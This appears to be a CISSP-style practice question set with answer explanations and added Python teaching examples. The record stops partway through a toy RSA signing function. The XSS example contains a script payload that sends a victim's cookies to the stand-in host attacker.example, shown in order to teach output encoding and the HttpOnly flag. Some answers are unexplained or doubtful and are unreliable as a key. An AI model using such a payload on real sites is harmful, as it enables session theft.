Which Wide Area Network (WAN) technology requires the first router in the path to determine the full path the packet will travel, removing the need for other routers in the path to make independent determinations? A. Synchronous Optical Networking (SONET) B. Multiprotocol Label Switching (MPLS) C. Fiber Channel Over Ethernet (FCoE) D. Session Initiation Protocol (SIP)

B. Multiprotocol label switching (MPLS) is a technique for speeding up network connections that was first developed in the 1990s. The public Internet functions by forwarding packets from one router to the next until the packets reach their destination. MPLS, on the other hand, sends packets along predetermined network paths. Ideally, the result is that routers spend less time deciding where to forward each packet, and packets take the same path every time. Consider the process of planning a long drive. Instead of identifying which towns and cities one must drive through in order to reach the destination, it is usually more efficient to identify the roads that go in the correct direction. Similarly, MPLS identifies paths — network "roads" — rather than a series of intermediary destinations. https://www.cloudflare.com/learning/network-layer/what-is-mpls/

What is a security concern when considering implementing software-defined networking (SDN)? A. It has a decentralized architecture. B. It increases the attack footprint. C. It uses open source protocols. D. It is cloud based.

B. "A significant issue regarding SDN security is that virtualizing every aspect of the network infrastructure increases your attack footprint." SDN introduces a centralized controller that manages the network infrastructure and allows for dynamic and programmable network configurations. While SDN offers advantages in terms of flexibility and automation, it also expands the attack surface of the network. With SDN, there is a single point of control that, if compromised, can have a significant impact on the entire network. The centralized nature of SDN makes it an attractive target for attackers. If they can gain unauthorized access to the SDN controller or exploit vulnerabilities in the controller software, they may be able to manipulate network configurations, redirect traffic, or launch attacks on other network components. https://www.networkworld.com/article/3245173/secure-your-sdn-controller.html

Which of the following is security control volatility? A. A reference to the impact of the security control. B. A reference to the likelihood of change in the security control. C. A reference to how unpredictable the security control is. D. A reference to the stability of the security control.

B. A reference to the likelihood of change in the security control. Security control volatility refers to how frequently a security control might need to be changed or updated over time, because of factors such as evolving threats and vulnerabilities, changes in technology, new regulations or compliance requirements, and organizational shifts in business needs. Why the other options are not correct: A. A reference to the impact of the security control: impact refers to the potential consequences or effects of the security control itself, not its volatility. C. A reference to how unpredictable the security control is: unpredictability implies randomness or a lack of reliability, which is not the focus of volatility. D. A reference to the stability of the security control: stability is the opposite of volatility; a control with low volatility would be considered more stable.

Which of the following threats would be MOST likely mitigated by monitoring assets containing open source libraries for vulnerabilities? A. Distributed denial-of-service (DDoS) attack B. Advanced persistent threat (APT) attempt C. Zero-day attack D. Phishing attempt

B. Advanced persistent threat (APT) attempt

An organization is setting a security assessment scope with the goal of developing a Security Management Program (SMP). The next step is to select an approach for conducting the risk assessment. Which of the following approaches is MOST effective for the SMP? A. Security controls driven assessment that focuses on controls management B. Business processes based risk assessment with a focus on business goals C. Asset driven risk assessment with a focus on the assets D. Data driven risk assessment with a focus on data

B. Business process-based risk assessment with a focus on business objectives. This approach ensures that risk assessment is aligned with business objectives and needs, enabling risk management that directly supports the organization's strategic objectives. By focusing on business processes, the organization can better understand how security risks affect its operations, and make informed decisions to mitigate these risks appropriately. https://www.ifc.org/content/dam/ifc/doc/mgrt/p-handbook-securityforces-2017.pdf https://policy.un.org/sites/policy.un.org/files/files/documents/2020/Oct/spm_-_chapter_iv_-_section_a_-_security_risk_management_2.pdf

What is the term used to define where data is geographically stored in the cloud? A. Data privacy rights B. Data sovereignty C. Data warehouse D. Data subject rights

B. Data sovereignty Data sovereignty refers to the legal and regulatory requirements that determine the physical location or jurisdiction in which data is stored, processed, and managed. It relates to the concept that data is subject to the laws and regulations of the country or region in which it resides. When data is stored in the cloud, organizations must consider data sovereignty to ensure compliance with applicable laws and regulations, as different countries may have different requirements regarding data privacy, security, and access. Data sovereignty addresses concerns about data protection, data privacy rights, and the control and ownership of data.

A database server for a financial application is scheduled for production deployment. Which of the following controls will BEST prevent tampering? A. Data sanitization B. Data validation C. Service accounts removal D. Logging and monitoring

B. Data validation

When assessing the audit capability of an application, which of the following activities is MOST important? A. Identify procedures to investigate suspicious activity. B. Determine if audit records contain sufficient information. C. Verify if sufficient storage is allocated for audit records. D. Review security plan for actions to be taken in the event of audit failure.

B. Determine if audit records contain sufficient information.

Which of the following is the PRIMARY reason for selecting the appropriate level of detail for audit record generation? A. Avoid lengthy audit reports B. Enable generation of corrective action reports C. Facilitate a root cause analysis (RCA) D. Lower costs throughout the System Development Life Cycle (SDLC)

B. Enable generation of corrective action reports. Auditing is the programmatic means by which a subject's actions are tracked and recorded for the purpose of holding the subject accountable for their actions while authenticated on a system through the documentation or recording of subject activities. It is also the process by which unauthorized or abnormal activities are detected on a system. Auditing is recording activities of a subject and its objects as well as recording the activities of application and system functions. Log files provide an audit trail for re-creating the history of an event, intrusion, or system failure. Auditing is needed to detect malicious actions by subjects, attempted intrusions, and system failures and to reconstruct events, provide evidence for prosecution, and produce problem reports and analysis.

Which of the following is an indicator that a company's new user security awareness training module has been effective? A. There are more secure connections to internal e-mail servers. B. More incidents of phishing attempts are being reported. C. Fewer incidents of phishing attempts are being reported. D. There are more secure connections to the internal database servers.

B. More incidents of phishing attempts are being reported. If users are more aware, then they should be reporting MORE instances of phishing attempts.

In the "Do" phase of the Plan-Do-Check-Act model, which of the following is performed? A. Maintain and improve the Business Continuity Management (BCM) system by taking corrective action, based on the results of management review. B. Monitor and review performance against business continuity policy and objectives, report the results to management for review, and determine and authorize actions for remediation and improvement. C. Ensure the business continuity policy, controls, processes, and procedures have been implemented. D. Ensure that business continuity policy, objectives, targets, controls, processes and procedures relevant to improving business continuity have been established.

C. Plan = plan, Do = perform, Check = monitor, Act = improve. PLAN: D. Ensure that business continuity policy, objectives, targets, controls, processes and procedures relevant to improving business continuity have been established. DO: C. Ensure the business continuity policy, controls, processes, and procedures have been implemented. CHECK: B. Monitor and review performance against business continuity policy and objectives, report the results to management for review, and determine and authorize actions for remediation and improvement. ACT: A. Maintain and improve the Business Continuity Management (BCM) system by taking corrective action, based on the results of management review.

What is considered the BEST explanation when determining whether to provide remote network access to a third-party security service? A. Contract negotiation B. Supplier request C. Business need D. Vendor demonstration

C Providing remote network access to a third-party security service is a decision that should be made based on the specific business needs and the risks involved. It is important to evaluate the requirements for the service and whether it is critical for the business operations.

When resolving ethical conflicts, the information security professional MUST consider many factors. In what order should the considerations be prioritized? A. Public safety, duties to individuals, duties to the profession, and duties to principals B. Public safety, duties to principals, duties to the profession, and duties to individuals C. Public safety, duties to principals, duties to individuals, and duties to the profession D. Public safety, duties to the profession, duties to principals, and duties to individuals

C Treat all members fairly. In resolving conflicts, consider public safety and duties to principals, individuals and the profession in that order. https://resources.infosecinstitute.com/certification/the-isc2-code-of-ethics-a-binding-requirement-for-certification/

Which of the following BEST describes the purpose of software forensics? A. To analyze possible malicious intent of malware B. To perform cyclic redundancy check (CRC) verification and detect changed applications C. To determine the author and behavior of the code D. To review program code to determine the existence of backdoors

C To determine the author and behavior of the code Software forensics is the science of analyzing software source code or binary code to determine whether intellectual property infringement or theft occurred. It is the centerpiece of lawsuits, trials, and settlements when companies are in dispute over issues involving software patents, copyrights, and trade secrets. Software forensics tools can compare code to determine correlation, a measure that can be used to guide a software forensics expert.

What is the FIRST step that should be considered in a Data Loss Prevention (DLP) program? A. Policy creation B. Information Rights Management (IRM) C. Data classification D. Configuration management (CM)

C) Data classification The first stage of DLP is discovery and classification. Discovery is the process of finding all instances of data, while classification is the act of categorizing that data based on its sensitivity and value to the organization. While you should have classified your data as part of your information asset inventory, many DLP tools are capable of applying signature-based logic that determines the classification of data. In many cases, your existing classification information can be used to "tune" the DLP to know what you consider sensitive. Examples of classifications might include "PCI data" (or "cardholder data"), "Social Security numbers," "PHI," and so on. Comprehensive discovery and proper classification is critical to the effectiveness of the remaining stages and to the success of your overall DLP implementation.

Which change management role is responsible for the overall success of the project and supporting the change throughout the organization? A. Change driver B. Project manager C. Program sponsor D. Change implementer

C) Program sponsor. The key phrase in the question is "supporting the change throughout the organization". Project sponsor vs. project manager: both the project sponsor and the project manager are highly involved in the project and responsible for its outcome and success. The project sponsor is the point of connection between the organization's executive team and the project manager; the project manager is the point of connection between the project sponsor and the project team. The project sponsor is responsible for the overall success of a project by providing financing and supportive resources, while the project manager oversees the project's day-to-day management by managing tasks, team members, and project progress.

When reviewing vendor certifications for handling and processing of company data, which of the following is the BEST Service Organization Controls (SOC) certification for the vendor to possess? A. SOC 1 Type 1 B. SOC 2 Type 1 C. SOC 2 Type 2 D. SOC 3

C. When reviewing vendor certifications for handling and processing of company data, the best Service Organization Controls (SOC) certification for the vendor to possess is SOC 2 Type II. It is the most stringent with regard to data security and privacy, and the most highly sought after by companies. It provides assurance that the vendor has appropriate processes, procedures, and controls in place for the data that they process, and that the vendor is upholding the standards set by the American Institute of Certified Public Accountants (AICPA). There is no Type 1 or Type 2 for SOC 3; it is a high-level report generally made publicly available on the vendor's website. SOC 1 and SOC 2 each have a Type 1 and a Type 2: Type 1 covers the design of the controls, while Type 2 covers the operating effectiveness of the controls.

Why is data classification control important to an organization? A. To enable data discovery B. To ensure security controls align with organizational risk appetite C. To ensure its integrity, confidentiality and availability D. To control data retention in alignment with organizational policies and regulation

C. Data classification is not performed to align security controls with the organization's risk appetite. It exists so that data is labeled by its sensitivity and criticality and handled accordingly: only individuals with the appropriate clearance or need-to-know get read or write access to a given class of data (confidentiality), and the storage, transmission and destruction requirements attached to each class then protect its integrity and availability as well.

Under the General Data Protection Regulation (GDPR), what is the maximum amount of time allowed for reporting a personal data breach? A. 24 hours B. 48 hours C. 72 hours D. 96 hours

C. 72 hours. GDPR Article 33 requires the controller to notify the supervisory authority without undue delay and, where feasible, no later than 72 hours after becoming aware of the breach; the clock starts at awareness, not at the moment of compromise, and a notification made after 72 hours must be accompanied by reasons for the delay. A processor must notify the controller without undue delay, and affected individuals must be informed (Article 34) when the breach is likely to result in a high risk to them.

A security architect is developing an information system for a client. One of the requirements is to deliver a platform that mitigates against common vulnerabilities and attacks. What is the MOST efficient option used to prevent buffer overflow attacks? A. Access control mechanisms B. Process isolation C. Address Space Layout Randomization (ASLR) D. Processor states

C. Address Space Layout Randomization (ASLR). ASLR is an operating-system memory protection that randomizes the base addresses of the stack, heap, shared libraries and (for position-independent executables) the program image each time a process starts. A buffer-overflow exploit normally needs a predictable address to return into, such as the location of injected shellcode or of a useful library function, so randomization turns a reliable exploit into a guess. Two caveats a practitioner should keep in mind: ASLR does not remove the overflow itself, it only makes exploiting it harder, so it is deployed together with stack canaries, non-executable memory (DEP/NX) and bounds-checked code; and an information leak that reveals a single address can defeat it. Among the options given, it is the only one that specifically targets buffer-overflow exploitation.

Compared to a traditional network, which of the following is a security-related benefit that software-defined networking (SDN) provides? A. Centralized network provisioning B. Reduced network latency when scaled C. Centralized network administrative control D. Reduced hardware footprint and cost

C. Centralized network administrative control

An organization recently suffered from a web-application attack that resulted in stolen user session cookie information. The attacker was able to obtain the information when a user's browser executed a script upon visiting a compromised website. What type of attack MOST likely occurred? A. SQL injection (SQLi) B. Extensible Markup Language (XML) external entities C. Cross-Site Scripting (XSS) D. Cross-Site Request Forgery (CSRF)

C. Cross-Site Scripting (XSS). The tell-tale detail is that the user's browser executed a script when visiting the compromised site and the script harvested the session cookie: XSS runs attacker-supplied script in the victim's browser, in the security context of the vulnerable site. CSRF is different: it tricks the browser into sending a forged request (with the cookies the browser attaches automatically) so that the server performs an action; the attacker never runs script in the page and never sees the cookie. OWASP describes the mechanism: "An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site." The standard defenses are contextual output encoding of untrusted data, a Content Security Policy, and the HttpOnly cookie flag, which keeps session cookies out of reach of script even when an injection slips through. https://owasp.org/www-community/attacks/xss/ https://owasp.org/www-community/attacks/csrf
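
The chain described in this answer, as an added example that is not part of the original study set: an attacker payload is interpolated into a page, once unsafely and once with output encoding, and the session cookie is issued with the HttpOnly flag that keeps document.cookie from exposing it. The payload, the page template and the hostname attacker.example are constructed for illustration.

```python
"""Added example (not code from the original page): a reflected XSS
cookie-theft chain and the two controls that break it, contextual output
encoding and the HttpOnly cookie flag. All inputs are constructed and the
attacker hostname is hypothetical."""
import html

# Constructed attacker payload: loads an image from an attacker-controlled
# host with the victim's cookies appended to the URL (hypothetical host).
PAYLOAD = ('<script>new Image().src="https://attacker.example/?c="'
           '+document.cookie</script>')


def render_vulnerable(search_term: str) -> str:
    """The bug: untrusted input is interpolated straight into HTML."""
    return f"<p>Results for: {search_term}</p>"


def render_hardened(search_term: str) -> str:
    """Same page, but the untrusted value is HTML-entity encoded for the
    element-body context first, so the browser renders it as text."""
    return f"<p>Results for: {html.escape(search_term, quote=True)}</p>"


def browser_would_execute_script(page: str) -> bool:
    """Crude stand-in for the browser's HTML parser: a literal <script>
    start tag in the markup means the script would run."""
    return "<script" in page.lower()


def session_cookie_header(token: str) -> str:
    """Session cookie with the flags a reviewer expects. HttpOnly keeps
    the value out of document.cookie, so injected script cannot read it;
    Secure keeps it off plaintext HTTP; SameSite=Lax limits cross-site
    sending, which is the CSRF side of the question."""
    return f"Set-Cookie: session={token}; HttpOnly; Secure; SameSite=Lax; Path=/"


def cookie_readable_by_script(set_cookie_header: str) -> bool:
    """document.cookie exposes only cookies that lack the HttpOnly flag."""
    return "httponly" not in set_cookie_header.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # script tag intact: would execute
    print(render_hardened(PAYLOAD))     # &lt;script&gt;...: rendered as text
    print(session_cookie_header("0123456789abcdef"))
```

The escaping shown is correct only for HTML element bodies and attribute values; untrusted data placed inside a script block, a URL or a CSS value needs the encoding for that context, which is why frameworks' auto-escaping and a Content Security Policy are used alongside it.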

The existence of physical barriers, card and personal identification number (PIN) access systems, cameras, alarms, and security guards BEST describes this security approach? A. Access control B. Security information and event management (SIEM) C. Defense-in-depth D. Security perimeter

C. Defense-in-depth This is a comprehensive strategy that integrates multiple layers of security, including both physical and logical controls. The description given fits this approach as it includes multiple layers of physical security measures.

What is the FIRST step when developing an Information Security Continuous Monitoring (ISCM) program? A. Collect the security-related information required for metrics, assessments, and reporting. B. Establish an ISCM program determining metrics, status monitoring frequencies, and control assessment frequencies. C. Define an ISCM strategy based on risk tolerance. D. Establish an ISCM technical architecture.

C. Define an ISCM strategy based on risk tolerance.

A company is enrolled in a hard drive reuse program where decommissioned equipment is sold back to the vendor when it is no longer needed. The vendor pays more money for functioning drives than equipment that is no longer operational. Which method of data sanitization would provide the most secure means of preventing unauthorized data loss, while also receiving the most money from the vendor? A. Pinning B. Single-pass wipe C. Multi-pass wipes D. Degaussing

C. Multi-pass wipes. Degaussing is ruled out by the business requirement: it erases a hard disk's servo tracks and often damages the electronics, so the drive no longer works and cannot be sold as a functioning unit, and it gives no visible confirmation of what was erased. Overwriting keeps the drive operational. A single-pass wipe is clearing; a multi-pass overwrite is purging, a more intense form of clearing that prepares media for reuse in less secure environments and provides a level of assurance that the original data is not recoverable using any known methods. A purging process repeats the clearing process multiple times and may combine it with another method, such as degaussing, to completely remove the data. Practitioner caveat: NIST SP 800-88 Rev. 1 treats a single verified overwrite pass as sufficient for modern magnetic drives, and for SSDs overwriting is unreliable because of wear leveling, so the drive's built-in sanitize/secure-erase command or cryptographic erase is used instead; on the exam, choose the most secure listed option that still leaves the drive usable.

Which of the following is the PRIMARY purpose of installing a mantrap within a facility? A. Control traffic B. Control air flow C. Prevent piggybacking D. Prevent rapid movement

C. Prevent Piggybacking

Which of the following technologies can be used to monitor and dynamically respond to potential threats on web applications? A. Field-level tokenization B. Web application vulnerability scanners C. Runtime application self-protection (RASP) D. Security Assertion Markup Language (SAML)

C. Runtime application self-protection (RASP). RASP is instrumentation built into, or attached to, the application runtime itself. Because it sees each call with its context (the SQL statement about to be executed, the file about to be opened, the object about to be deserialized), it can distinguish an attack from normal traffic and block or log it while the application is running, which is the "monitor and dynamically respond" behavior the question asks for. A vulnerability scanner only finds weaknesses before or between attacks, field-level tokenization protects stored values rather than the running application, and SAML is an authentication assertion format. RASP has become a common element of cloud application security strategies because it travels with the application into cloud or hybrid environments where traditional network-edge controls have little visibility.

Which of the following is a common term for log reviews, synthetic transactions, and code reviews? A. Application development B. Spiral development functional testing C. Security control testing D. DevOps Integrated Product Team (IPT) development

C. Security Control Testing Organizations must manage the security control testing that occurs to ensure that all security controls are tested thoroughly by authorized individuals. The facets of security control testing that organizations must include are vulnerability assessments, penetration testing, log reviews, synthetic transactions, code review and testing, misuse case testing, test coverage analysis, and interface testing. Log reviews involve analyzing system logs to identify any suspicious or anomalous activities that may indicate security incidents or policy violations. Synthetic transactions refer to simulated interactions with an application or system to test its behavior and response. Code reviews involve examining the source code of an application or software to identify security vulnerabilities and ensure compliance with coding standards.
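
A log review of the kind this answer describes, as an added example that is not part of the original study set: a small reviewer over constructed sshd-style authentication lines that flags a burst of failed logins from one source and a success that follows such a burst. The log lines, the host name and the addresses are constructed; the threshold and window are assumptions to tune for a real environment.

```python
"""Added example (not code from the original page): a minimal log review
over constructed sshd-style auth log lines. Flags (a) bursts of failed
logins from one source and (b) a success from a source that had just been
failing, the pattern behind brute force and password spraying."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (syslog-like, with the year included so the
# timestamps parse). 203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges, not real hosts.
SAMPLE_LOG = """\
2024-03-01 10:00:01 host1 sshd[100]: Failed password for invalid user admin from 203.0.113.5 port 5001 ssh2
2024-03-01 10:00:03 host1 sshd[100]: Failed password for root from 203.0.113.5 port 5002 ssh2
2024-03-01 10:00:04 host1 sshd[100]: Failed password for root from 203.0.113.5 port 5003 ssh2
2024-03-01 10:00:06 host1 sshd[100]: Failed password for alice from 203.0.113.5 port 5004 ssh2
2024-03-01 10:00:07 host1 sshd[100]: Failed password for alice from 203.0.113.5 port 5005 ssh2
2024-03-01 10:00:09 host1 sshd[101]: Accepted password for alice from 203.0.113.5 port 5006 ssh2
2024-03-01 10:05:00 host1 sshd[102]: Failed password for bob from 198.51.100.7 port 6001 ssh2
2024-03-01 10:30:00 host1 sshd[103]: Accepted publickey for bob from 198.51.100.7 port 6002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)


def parse(log_text):
    """Return (timestamp, result, user, ip) for each matching line.
    Lines the pattern does not recognise are skipped, not fatal: a log
    review must survive a format it did not expect."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def review(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return a list of finding strings (assumed threshold and window)."""
    findings = []
    failures = defaultdict(list)          # ip -> timestamps of failures
    for ts, result, user, ip in parse(log_text):
        recent = [t for t in failures[ip] if ts - t <= window]
        if result == "Failed":
            failures[ip].append(ts)
            if len(recent) + 1 == threshold:   # fire once, when crossing the line
                findings.append(
                    f"brute-force: {threshold} failures from {ip} within {window.seconds}s")
        elif recent:
            findings.append(
                f"success-after-failures: {user} from {ip} after {len(recent)} recent failures")
    return findings


if __name__ == "__main__":
    for finding in review(SAMPLE_LOG):
        print(finding)
```

The second rule is the one worth keeping in production: a single success after a run of failures is the moment a guessed password started working, and it is far rarer than the failure burst alone. Bob's one failure followed by a key-based login 25 minutes later stays below both rules, which is the behaviour you want from a reviewer that must not drown analysts in noise.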

What is the MOST effective response to a hacker who has already gained access to a network and will attempt to pivot to other resources? A. Warn users of a breach. B. Reset all passwords. C. Segment the network. D. Shut down the network.

C. Segment the network

In software development, which of the following entities normally signs the code to protect the code integrity? A. The organization developing the code B. The quality control group C. The developer D. The data owner

C. The developer. Code signing lets the party that produced the code prove its authenticity and integrity to whoever runs it. The developer computes a hash of the code and signs it with their private key; the verifier (an operating-system loader, package manager, app store or browser) uses the developer's public key, normally distributed in a certificate from a trusted CA, to check the signature and confirm that the code is legitimate and was not modified by unauthorized individuals. In many organizations the signing key lives in a release pipeline or an HSM rather than on an individual workstation, but it is still exercised on behalf of the developer as the code's author, which is why the exam treats the developer as the signing entity.

Which of the following is the BEST method to validate secure coding techniques against injection and overflow attacks? A. Scheduled team review of coding style and techniques for vulnerability patterns B. The regular use of production code routines from similar applications already in use C. Using automated programs to test for the latest known vulnerability patterns D. Ensure code editing tools are updated against known vulnerability patterns

C. Using automated programs to test for the latest known vulnerability patterns. Static analysis (SAST) scans the source for dangerous sinks such as unparameterized SQL or unbounded string copies, and dynamic analysis (DAST) and fuzzing send malformed or injected input to the running application; both are automated, repeatable and kept current with newly discovered patterns, so they validate the secure coding techniques directly rather than relying on reviewer memory or on editor plug-ins.

International bodies established a regulatory scheme that defines how weapons are exchanged between the signatories. It also addresses cyber weapons, including malicious software, Command and Control (C2) software, and internet surveillance software. This is a description of which of the following? A. International Traffic in Arms Regulations (ITAR) B. Palermo convention C. Wassenaar arrangement D. General Data Protection Regulation (GDPR)

C. Wassenaar Arrangement. The Wassenaar Arrangement on Export Controls for Conventional Arms and Dual-Use Goods and Technologies is a multilateral export control regime established on 12 July 1996 in Wassenaar, near The Hague, Netherlands. According to the Wassenaar Arrangement document, it was "established to contribute to regional and international security and stability by promoting transparency and greater responsibility in transfers of conventional arms and dual-use goods and technologies, thus preventing destabilizing accumulations. Participating states seek, through their national policies, to ensure that transfers of these items do not contribute to the development or enhancement of military capabilities which undermine these goals, and are not diverted to support such capabilities." In December 2013 the participating states added "intrusion software" and IP network surveillance systems to the dual-use control lists, which is why the arrangement now reaches malware, Command and Control tooling and surveillance software. ITAR, by contrast, is a United States regulation rather than an international one.

Which of the following BEST describes when an organization should conduct a black box security audit on a new software product? A. When the organization wishes to check for non-functional compliance B. When the organization wants to enumerate known security vulnerabilities across their infrastructure C. When the organization is confident the final source code is complete D. When the organization has experienced a security incident

C. When the organization is confident the final source code is complete C is the best answer. A black box security audit tests the externally visible behavior of a system without knowledge of its internal structure and implementation. It is most useful when the final source code is complete, to check for unknown vulnerabilities before deployment.

An organization is looking to include mobile devices in its asset management system for better tracking. In which system tier of the reference architecture would mobile devices be tracked? A. 0 B. 1 C. 2 D. 3

D. Tier 3. The ITAM reference architecture (NIST SP 1800-5, IT Asset Management) describes how data flows through the ITAM system in tiers. Tier 3 consists of the enterprise assets themselves: all the hardware, software and virtual machines being tracked, which is where mobile devices belong. Tier 2 is the sensors and independent systems that feed data into the enterprise ITAM system, including passive and active collection sensors and agents. Tier 1 is the enterprise ITAM system itself, which aggregates the data from all Tier 2 systems into business and security intelligence.

Which part of an operating system (OS) is responsible for providing security interfaces among the hardware, OS, and other parts of the computing system? A. Reference monitor B. Trusted Computing Base (TCB) C. Time separation D. Security kernel

D. Security kernel. The security kernel is the central part of a computer or communications system's hardware, firmware and software that implements the basic security procedures for controlling access to system resources; it is the part of the TCB that implements the reference monitor concept, which is why it is the component that provides the security interfaces between the hardware, the OS and the rest of the system. TCB: the trusted computing base of a computer system is the set of all hardware, firmware and/or software components that are critical to its security, in the sense that bugs or vulnerabilities occurring inside the TCB might jeopardize the security properties of the entire system; parts of the system outside the TCB must not be able to misbehave in a way that would leak more privileges than the security policy grants them. Reference monitor: the reference monitor concept defines a set of design requirements on a reference validation mechanism that enforces an access control policy over subjects' (e.g., processes and users) ability to perform operations (e.g., read and write) on objects (e.g., files and sockets). Its required properties are captured by the acronym NEAT: Non-bypassable, Evaluable (small and simple enough to verify), Always invoked (complete mediation) and Tamper-proof. https://en.m.wikipedia.org/wiki/Security_kernel

When recovering from an outage, what is the Recovery Point Objective (RPO), in terms of data recovery? A. The RPO is the minimum amount of data that needs to be recovered. B. The RPO is the amount of time it takes to recover an acceptable percentage of data lost. C. The RPO is a goal to recover a targeted percentage of data lost. D. The RPO is the maximum amount of time for which loss of data is acceptable.

D. The Recovery Point Objective (RPO) is the maximum amount of time for which loss of data is acceptable in the event of an outage or disaster. The RPO defines the point in time to which data must be recovered after a disruption, indicating the acceptable level of data loss. It represents the maximum tolerable period during which data may be lost without causing significant impact or harm to the business operations or objectives. For example, if a company has an RPO of 1 hour, it means that in the event of an outage, the organization can accept a maximum data loss of up to 1 hour's worth of data. The data must be restored or recovered to a state no older than 1 hour before the incident occurred.

Which of the following BEST describes centralized identity management? A. Service providers perform as both the credential and identity provider (IdP). B. Service providers identify an entity by behavior analysis versus an identification factor. C. Service providers agree to integrate identity system recognition across organizational boundaries. D. Service providers rely on a trusted third party (TTP) to provide requestors with both credentials and identifiers.

D. Centralized identity management means a single entity, the identity provider (IdP), holds the users' identities and credentials and performs authentication for every service provider that trusts it; decentralized (distributed) identity management instead has each service provider or domain maintain its own. Because the identity is managed once and reused across all applications, a user needs only one account and one console to reach a variety of services, and an attribute change (a new address, a revoked entitlement) propagates everywhere. For example, a bank acting as a service provider can rely on an IdP to give customers seamless access to externally managed services such as ordering checks, sending money through a cash app or applying for a loan, and a customer who updates their address in one application has it updated in all of them. Option C describes federation, which links separate identity systems across organizational boundaries rather than centralizing them.

An organization has been collecting a large amount of redundant and unusable data and filling up the storage area network (SAN). Management has requested the identification of a solution that will address ongoing storage problems. Which is the BEST technical solution? A. Compression B. Caching C. Replication D. Deduplication

D. Deduplication is the process of eliminating redundant copies of data, which is the best solution for addressing the issue of redundant and unusable data filling up the storage area network (SAN).
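
The mechanism behind this answer, as an added example that is not part of the original study set: a fixed-size, content-addressed block store of the kind a SAN or backup appliance uses, storing each distinct block once and keeping a per-file recipe of block hashes. The workload (a file, a verbatim backup copy and an edited version) and the 4 KiB block size are constructed for illustration; real systems usually add variable-size chunking.

```python
"""Added example (not code from the original page): fixed-size,
content-addressed block deduplication. Each distinct block is stored once
under its SHA-256 and files are kept as recipes of block hashes."""
import hashlib

CHUNK = 4096  # assumed block size; production systems also use variable-size chunking


class DedupStore:
    def __init__(self):
        self.blocks = {}        # sha256 hex -> bytes, stored exactly once
        self.files = {}         # file name -> list of block hashes (recipe)
        self.logical_bytes = 0  # what the clients think they stored

    def put(self, name: str, data: bytes) -> int:
        """Store a file; return how many *new* bytes reached the backing store."""
        new_bytes = 0
        recipe = []
        for offset in range(0, len(data), CHUNK):
            block = data[offset:offset + CHUNK]
            digest = hashlib.sha256(block).hexdigest()
            if digest not in self.blocks:       # first time we see this content
                self.blocks[digest] = block
                new_bytes += len(block)
            recipe.append(digest)
        self.files[name] = recipe
        self.logical_bytes += len(data)
        return new_bytes

    def get(self, name: str) -> bytes:
        """Reassemble a file from its recipe, re-hashing each block on read
        so silent corruption of a shared block is detected, not served."""
        out = bytearray()
        for digest in self.files[name]:
            block = self.blocks[digest]
            if hashlib.sha256(block).hexdigest() != digest:
                raise ValueError(f"stored block corrupted: {digest}")
            out += block
        return bytes(out)

    def physical_bytes(self) -> int:
        return sum(len(b) for b in self.blocks.values())

    def ratio(self) -> float:
        """Logical-to-physical ratio, the number vendors quote."""
        return self.logical_bytes / max(1, self.physical_bytes())


def demo():
    """Constructed workload: a file of five distinct blocks, a verbatim
    backup copy of it, and a second version with one block changed."""
    original = b"".join(bytes([i]) * CHUNK for i in range(5))
    edited = original[:2 * CHUNK] + bytes([0xFF]) * CHUNK + original[3 * CHUNK:]
    store = DedupStore()
    written = [store.put("report.doc", original),
               store.put("backup/report.doc", original),
               store.put("report_v2.doc", edited)]
    return store, written


if __name__ == "__main__":
    store, written = demo()
    print("bytes newly written per put:", written)
    print("logical:", store.logical_bytes, "physical:", store.physical_bytes(),
          "ratio:", store.ratio())
```

Two security observations fall out of the design: deduplication needs to see the plaintext, so data encrypted client-side with unique keys does not deduplicate (which is the trade-off behind convergent encryption schemes), and a single shared block now backs many files, so the read-time hash check in get() is what keeps one corrupted block from silently spreading to every file that references it.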

Which of the following is the PRIMARY type of cryptography required to support non-repudiation of a digitally signed document? A. Hashing B. Message digest (MD) C. Symmetric D. Asymmetric

D. Asymmetric. Non-repudiation requires something only the signer could have produced. The sender hashes the document and signs the hash with their private key; the recipient (or any third party) verifies the signature with the sender's public key, which a certificate binds to the sender's identity. Because the private key is held only by the sender, a valid signature proves both integrity and origin, and the sender cannot later deny having signed. Hashing and message digests alone give integrity but say nothing about who produced the document, and symmetric cryptography (including HMACs) cannot provide non-repudiation because every party holding the shared key could have created the same value.
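
The contrast this answer draws, as an added example that is not part of the original study set: an HMAC under a shared key, which the receiver can reproduce exactly, beside a signature that only the private key can produce. The RSA here is a textbook toy (small fixed primes, no padding) written for illustration; real code uses a vetted library with RSA-PSS or Ed25519 and proper key sizes. The key, primes and document are constructed.

```python
"""Added example (not code from the original page): why symmetric
authentication (HMAC) gives integrity and origin authentication between
the two key holders but not non-repudiation, while an asymmetric signature
does. Toy RSA with tiny fixed primes and no padding: illustration only."""
import hashlib
import hmac

# --- Symmetric: sender and receiver hold the same key ----------------------
SHARED_KEY = b"constructed-shared-secret"   # constructed, not a real key


def mac(msg: bytes, key: bytes = SHARED_KEY) -> bytes:
    return hmac.new(key, msg, hashlib.sha256).digest()


def receiver_can_forge(msg: bytes) -> bool:
    """The receiver, holding the same key, produces a tag identical to the
    sender's, so a judge cannot tell which party created it: integrity and
    peer authentication, but no non-repudiation."""
    senders_tag = mac(msg)
    receivers_tag = mac(msg)   # same key, same algorithm, same tag
    return hmac.compare_digest(senders_tag, receivers_tag)


# --- Asymmetric: only the signer holds the private exponent ----------------
P, Q = 1000000007, 998244353     # toy primes, far too small for real use
N = P * Q
E = 65537                        # public exponent
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent (Python 3.8+)


def _digest_int(msg: bytes) -> int:
    """Hash the document first; the signature covers the digest, not the message."""
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def sign(msg: bytes, private_exponent: int = D) -> int:
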